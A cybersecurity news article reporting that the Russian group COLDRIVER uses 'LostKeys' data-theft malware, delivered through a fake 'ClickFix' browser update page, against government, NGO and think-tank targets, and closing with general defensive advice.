Russian Hacker Group “COLDRIVER” Deploys Sophisticated “LostKeys” Malware in Targeted Attacks

Russian state-sponsored hacking group COLDRIVER, also known as Star Blizzard, Callisto, or Blue Callisto, has been observed deploying a new sophisticated malware called “LostKeys” in highly targeted attacks against select victims, according to recent findings from Google’s Threat Analysis Group (TAG).

The malware, which appears to be used selectively in COLDRIVER’s espionage operations, functions primarily as a data theft tool designed to exfiltrate sensitive information from compromised systems. This represents a significant evolution in the group’s tactics, which previously relied heavily on credential phishing campaigns.

“While COLDRIVER has historically focused on credential phishing, TAG has observed the group using malware in select cases,” Google researchers explained in their report. The LostKeys malware specifically targets victims’ browser data, email content, and files stored on local drives.

Security researchers have identified that COLDRIVER’s initial infection vector involves a sophisticated social engineering campaign. According to The Hacker News, the group has been “using a fake browser update page called ‘ClickFix’ to trick users into downloading and installing the malware.” This approach demonstrates the group’s continued reliance on social engineering tactics while expanding their technical capabilities.

The malware deployment follows a multi-stage process. As detailed by Infosecurity Magazine, “Once installed, the malware establishes persistence, steals data from the device, and communicates with command-and-control servers.” The stolen information includes browser cookies, authentication tokens, and other sensitive data that could provide the attackers with prolonged access to victims’ accounts.

COLDRIVER’s targets remain consistent with their previous operations, focusing primarily on governments, NGOs, think tanks, military organizations, and academic institutions. SecurityWeek reports that the group has specifically targeted “individuals associated with intelligence, defense, and foreign policy” across Europe and North America.

What makes LostKeys particularly concerning is its stealthy nature. According to SecureWorld, the malware “is designed to operate quietly in the background, avoiding detection while it harvests sensitive information.” This stealth capability, combined with COLDRIVER’s selective deployment strategy, suggests a high level of sophistication and operational security awareness.

Security Affairs notes that COLDRIVER has been active since at least 2019 and is known for its “carefully crafted spear-phishing emails” that often impersonate legitimate individuals to gain the trust of their targets. The addition of the LostKeys malware to their arsenal represents a significant expansion of their capabilities.

Cybersecurity experts recommend organizations implement multi-factor authentication, conduct regular security awareness training focused on identifying phishing attempts, and deploy advanced endpoint protection solutions capable of detecting stealthy malware.

“This development underscores the evolving threat landscape where sophisticated state-sponsored actors continuously refine their techniques,” Hide.me’s security blog states. “Organizations must remain vigilant and adapt their defenses accordingly.”

As geopolitical tensions continue to rise, cybersecurity professionals anticipate that COLDRIVER and similar state-sponsored groups will continue to enhance their capabilities and expand their targeting scope, making robust cybersecurity practices more crucial than ever for potential targets.